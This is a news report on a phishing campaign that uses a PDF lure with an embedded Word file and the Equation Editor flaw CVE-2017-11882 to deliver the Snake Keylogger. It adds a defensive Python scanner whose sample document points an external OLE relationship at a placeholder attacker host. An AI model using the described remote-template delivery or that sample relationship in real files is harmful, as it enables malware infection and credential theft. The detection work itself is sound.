Microsoft Word is also leveraged in the email campaign, which employs a 22-year-old Office RCE bug.
Though most malicious email campaigns use Word documents to conceal and spread malware, a recently discovered campaign uses a malicious PDF file and a 22-year-old Office bug to propagate the Snake Keylogger malware, researchers have found.
The campaign, discovered by researchers at HP Wolf Security, aims to dupe victims with an attached PDF file purporting to contain information about a remittance payment, according to a blog post published Friday. Instead, it loads the information-stealing malware, using some tricky evasion tactics to avoid detection.
“While Office formats remain popular, this campaign shows how attackers are also using weaponized PDF documents to infect systems,” HP Wolf Security researcher Patrick Schlapfer wrote in the post, which opined in its headline that “PDF Malware Is Not Yet Dead.”
Indeed, attackers running malicious email campaigns have preferred to package malware in Microsoft Office file formats, particularly Word and Excel, for the past decade, Schlapfer said. In the first quarter of 2022 alone, nearly half (45 percent) of malware stopped by HP Wolf Security used Office formats, according to the researchers.
“The reasons are clear: users are familiar with these file types, the applications used to open them are ubiquitous, and they are suited to social engineering lures,” he wrote.
However, while the new campaign uses a PDF as the lure file, it later employs Microsoft Word to deliver the final payload, the Snake Keylogger, researchers found. Snake Keylogger is malware written in .NET that first appeared in late 2020 and is aimed at stealing sensitive information from a victim’s device, including saved credentials, the victim’s keystrokes, screenshots of the victim’s screen, and clipboard data, according to Fortinet.
‘Unusual’ Campaign
The HP Wolf Security team discovered a new PDF-based threat campaign on March 23 with an “unusual infection chain,” involving not just a PDF but also “several tricks to evade detection, such as embedding malicious files, loading remotely-hosted exploits and shellcode encryption,” Schlapfer wrote.
Attackers target victims with emails that include a PDF document named “REMMITANCE INVOICE.pdf” (misspelling intended) as an attachment. If someone opens the file, Adobe Reader prompts the user to open a .docx file with a rather curious name, researchers found.
“The attackers sneakily named the Word document ‘has been verified. However PDF, Jpeg, xlsx, .docx’ to make it look as though the file name was part of the Adobe Reader prompt,” according to the post.
The .docx file is stored as an EmbeddedFile object inside the PDF, and clicking on it opens Microsoft Word, researchers found. If Protected View is disabled, Word downloads a Rich Text Format (.rtf) file from a web server, which is then run in the context of the open document.
Researchers unzipped the contents of the .docx, which is an Office Open XML archive, and found a URL hidden in its “document.xml.rels” file pointing to a domain that is not a legitimate one normally found in Office documents, they reported.
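One defensive check the description above suggests, as an added example that is not code from the HP Wolf Security post: unzip a Word file, list every relationship in its .rels parts that points outside the archive (TargetMode="External"), and flag the non-hyperlink ones that resolve over HTTP, since those make Word fetch remote content when the document opens. The sample document, the oleObject relationship type and the hostnames below are constructed placeholders, not indicators from the campaign.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def external_relationships(docx_bytes):
    """Return (rels_part, short_type, target) for every relationship in an
    Office Open XML archive marked TargetMode="External"."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, short_type, rel.get("Target", "")))
    return hits

def suspicious(hits):
    """Clickable hyperlinks are normal; any other external relationship that
    resolves over HTTP(S) makes Word fetch content when the file is opened."""
    return [h for h in hits if h[1] != "hyperlink" and re.match(r"(?i)https?://", h[2])]

def build_sample_docx():
    """Constructed minimal .docx: one internal part, one ordinary hyperlink and
    one external OLE relationship to a placeholder host (not a real indicator)."""
    rels = (f'<?xml version="1.0" encoding="UTF-8"?>\n<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{OOXML}styles" Target="styles.xml"/>'
            f'<Relationship Id="rId2" Type="{OOXML}hyperlink" Target="https://example.invalid/" TargetMode="External"/>'
            f'<Relationship Id="rId3" Type="{OOXML}oleObject" Target="http://attacker.example/payload.rtf" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    for part, kind, target in suspicious(external_relationships(build_sample_docx())):
        print(f"{part}: {kind} relationship fetches {target}")
```

The same scan applies to any OOXML container (.xlsx, .pptx), since they share the relationship schema.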
17-Year-Outdated Bug Exploited
Connecting to this URL leads to a redirect and then downloads an RTF document called “f_doc_shp.doc.” This document contained two “not well-formed” OLE objects that revealed shellcode exploiting CVE-2017-11882, which researchers said is an “over 4-years-old” remote code execution (RCE) vulnerability in Equation Editor.
Equation Editor is an application installed by default with the Office suite that is used to insert and edit complex equations as Object Linking and Embedding (OLE) items in Microsoft Word documents.
It turns out, however, that the bug attackers leverage in the campaign is actually one that Microsoft patched more than four years ago, in 2017 to be exact, but which had existed some 17 years before that, making it 22 years old now.
As the final act of the attack, researchers found shellcode stored in the “OLENativeStream” structure at the end of one of the OLE objects they examined. The code eventually decrypts a ciphertext that turns out to be more shellcode, which is then executed and leads to an executable called fresh.exe that loads the Snake Keylogger, researchers found.